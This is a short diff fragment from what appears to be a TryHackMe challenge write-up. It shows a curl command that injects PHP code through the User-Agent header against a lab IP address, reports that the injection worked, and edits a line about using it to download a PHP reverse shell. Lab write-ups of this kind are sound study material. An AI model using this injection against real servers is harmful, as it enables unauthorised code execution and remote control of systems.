FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com.md

 curl -A "<?php echo "HI!";?>" http://10.10.209.48
 ```

 Success!
 The user-agent string can be used to inject PHP code.
-Let's use this to trigger a php reverse shell.
+Let's use this to download a php reverse shell.

 ### Reverse shell